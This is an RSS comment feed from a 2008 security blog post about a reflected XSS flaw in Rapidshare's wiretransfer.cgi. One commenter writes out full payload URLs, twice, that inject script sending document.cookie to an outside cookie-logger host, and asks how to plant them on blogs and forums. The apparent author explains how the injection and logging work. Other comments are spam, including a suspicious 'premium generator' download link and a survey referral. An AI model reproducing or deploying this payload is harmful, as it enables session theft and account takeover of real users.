<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/2.2.3" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>
<channel>
	<title>Comments on: I Own Your Rapidshare Accounts</title>
	<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/</link>
	<description>Giorgio Maone's answers to the Web, the Universe, and Everything</description>
	<pubDate>Thu, 18 Mar 2010 14:07:05 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2.3</generator>

	<item>
		<title>By: kristine</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-12531</link>
		<dc:creator>kristine</dc:creator>
		<pubDate>Thu, 07 May 2009 06:57:54 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-12531</guid>
		<description>http://rapidshare.com/files/230103712/generator_RS_Premium.rar

best way is the generator</description>
		<content:encoded><![CDATA[<p><a href="http://rapidshare.com/files/230103712/generator_RS_Premium.rar" rel="nofollow">http://rapidshare.com/files/230103712/generator_RS_Premium.rar</a></p>
<p>best way is the generator</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Samsul</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-11043</link>
		<dc:creator>Samsul</dc:creator>
		<pubDate>Wed, 18 Feb 2009 00:48:33 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-11043</guid>
		<description>Right @N00b, I wonder if there's any way to do this :-)</description>
		<content:encoded><![CDATA[<p>Right @N00b, I wonder if there&#8217;s any way to do this :-)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Hacking Yahoo/Gmail/Hotmail Accounts (A-Z Guide)</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-10514</link>
		<dc:creator>Hacking Yahoo/Gmail/Hotmail Accounts (A-Z Guide)</dc:creator>
		<pubDate>Tue, 20 Jan 2009 22:48:13 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-10514</guid>
		<description>[...] users (and I repet myself) TEND TO USE THE SAME PASSWORD over and over again. Take a look at this article which is an example of such an attack. I’m sure the majority of rapidshare users use [...]</description>
		<content:encoded><![CDATA[<p>[&#8230;] users (and I repet myself) TEND TO USE THE SAME PASSWORD over and over again. Take a look at this article which is an example of such an attack. I’m sure the majority of rapidshare users use [&#8230;]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: smart</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-10399</link>
		<dc:creator>smart</dc:creator>
		<pubDate>Thu, 15 Jan 2009 03:00:26 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-10399</guid>
		<description>free rapidshare premium account!!!
http://www.AWSurveys.com/HomeMain.cfm?RefID=smartnike</description>
		<content:encoded><![CDATA[<p>free rapidshare premium account!!!<br />
<a href="http://www.AWSurveys.com/HomeMain.cfm?RefID=smartnike" rel="nofollow">http://www.AWSurveys.com/HomeMain.cfm?RefID=smartnike</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Dronen</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8932</link>
		<dc:creator>Dronen</dc:creator>
		<pubDate>Wed, 06 Aug 2008 22:37:30 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8932</guid>
		<description>Fixed on 06-Aug-2008</description>
		<content:encoded><![CDATA[<p>Fixed on 06-Aug-2008</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: N00b</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8930</link>
		<dc:creator>N00b</dc:creator>
		<pubDate>Wed, 06 Aug 2008 19:29:06 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8930</guid>
		<description>I hear that rapidshare have fixed this exploit now :(

Wondered why i couldnt get it to work!!

Is there any other way to do this?</description>
		<content:encoded><![CDATA[<p>I hear that rapidshare have fixed this exploit now :(</p>
<p>Wondered why i couldnt get it to work!!</p>
<p>Is there any other way to do this?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Steph</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8853</link>
		<dc:creator>Steph</dc:creator>
		<pubDate>Wed, 30 Jul 2008 17:47:15 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8853</guid>
		<description>It's okay, I figured it out by trying it myself. The requests are logged in the Raw Access log on my server :3

But I'm not sure how I can embed this code on a webpage. I tried to post it on my blog to test it. I posted it in the &#34;website&#34; field in a comment, like this : 

http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20&#34;http://www.wasabite.com/cookielogger/rapidshare/?c=&#34;%20%2B%20escape(document.cookie);}))()%3C/script%3E

The link appears correctly in the status bar but when I click on it, but it shows up like this in the URL bar :
http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345&#34;&#62;   &#60;== See the ?c= %2B escape part... there is no &#34;+&#34;

I also tried on a forum using bbCode.
[img size=150]http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20&#34;http://www.wasabite.com/cookielogger/rapidshare/?c=&#34;%20%2B%20escape(document.cookie);}))()%3C/script%3E[/img]

I have absolutely no clue if it will work. I've never worked with JavaScript before, so I don't know anything about it. The only thing I know is C++ that is very similar to JS.</description>
		<content:encoded><![CDATA[<p>It&#8217;s okay, I figured it out by trying it myself. The requests are logged in the Raw Access log on my server :3</p>
<p>But I&#8217;m not sure how I can embed this code on a webpage. I tried to post it on my blog to test it. I posted it in the &quot;website&quot; field in a comment, like this : </p>
<p><a href="http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E" rel="nofollow">http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E</a>((function()%20{new%20Image().src%20=%20&quot;http://www.wasabite.com/cookielogger/rapidshare/?c=&quot;%20%2B%20escape(document.cookie);}))()%3C/script%3E</p>
<p>The link appears correctly in the status bar but when I click on it, but it shows up like this in the URL bar :<br />
<a href="http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345&quot;&gt;" rel="nofollow">http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345&quot;&gt;</a>   &lt;== See the ?c= %2B escape part&#8230; there is no &quot;+&quot;</p>
<p>I also tried on a forum using bbCode.<br />
[img size=150]http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20&quot;http://www.wasabite.com/cookielogger/rapidshare/?c=&quot;%20%2B%20escape(document.cookie);}))()%3C/script%3E[/img]</p>
<p>I have absolutely no clue if it will work. I&#8217;ve never worked with JavaScript before, so I don&#8217;t know anything about it. The only thing I know is C++ that is very similar to JS.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Steph</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8846</link>
		<dc:creator>Steph</dc:creator>
		<pubDate>Wed, 30 Jul 2008 10:34:32 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8846</guid>
		<description>Cool thanks!
But now... how do you access the info logged on your server? Is it just in a log that logs all the requests to your server, so when someone requests the image object source, the request for the source is recorded in your log?
It's the only bit I'm not sure to understand, where the info is recorded.
Thanks! :3</description>
		<content:encoded><![CDATA[<p>Cool thanks!<br />
But now&#8230; how do you access the info logged on your server? Is it just in a log that logs all the requests to your server, so when someone requests the image object source, the request for the source is recorded in your log?<br />
It&#8217;s the only bit I&#8217;m not sure to understand, where the info is recorded.<br />
Thanks! :3</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Giorgio</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8843</link>
		<dc:creator>Giorgio</dc:creator>
		<pubDate>Wed, 30 Jul 2008 06:34:23 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8843</guid>
		<description>@&lt;b&gt;Steph&lt;/b&gt;:
All correct.
[injection] is working because the Rapidshare CGI script echoes it back like it is, so the thing is rendered as a client side script.
I log the cookie to my server by creating an Image object and using the URL for my logger as its &lt;code&gt;src&lt;/code&gt; property: that URL is immediately loaded in background.

@&lt;b&gt;newbie&lt;/b&gt;:
No purpose for the parentheses around the function, other than readability: it means create this function but evaluate it in a string context, just like calling its &lt;code&gt;toString()&lt;/code&gt; method.
&lt;code&gt;var [login, pwd] =&lt;/code&gt; is a &lt;a href="http://developer.mozilla.org/en/docs/New_in_JavaScript_1.7#Destructuring_assignment" rel="nofollow"&gt;destructuring assignment&lt;/a&gt;.</description>
		<content:encoded><![CDATA[<p>@<b>Steph</b>:<br />
All correct.<br />
[injection] is working because the Rapidshare CGI script echoes it back like it is, so the thing is rendered as a client side script.<br />
I log the cookie to my server by creating an Image object and using the URL for my logger as its <code>src</code> property: that URL is immediately loaded in background.</p>
<p>@<b>newbie</b>:<br />
No purpose for the parentheses around the function, other than readability: it means create this function but evaluate it in a string context, just like calling its <code>toString()</code> method.<br />
<code>var [login, pwd] =</code> is a <a href="http://developer.mozilla.org/en/docs/New_in_JavaScript_1.7#Destructuring_assignment" rel="nofollow">destructuring assignment</a>.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: newbie</title>
		<link>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8841</link>
		<dc:creator>newbie</dc:creator>
		<pubDate>Wed, 30 Jul 2008 04:41:55 +0000</pubDate>
		<guid>http://hackademix.net/2008/07/15/i-own-your-rapidshare-accounts/#comment-8841</guid>
		<description>Hi Giorgio.  What is the purpose for those parenthesis around the function in your injection variable?  Also, what is this thing with the braces called:   var [login, pwd] ?  Thanks</description>
		<content:encoded><![CDATA[<p>Hi Giorgio.  What is the purpose for those parenthesis around the function in your injection variable?  Also, what is this thing with the braces called:   var [login, pwd] ?  Thanks</p>
]]></content:encoded>
	</item>
</channel>
</rss>
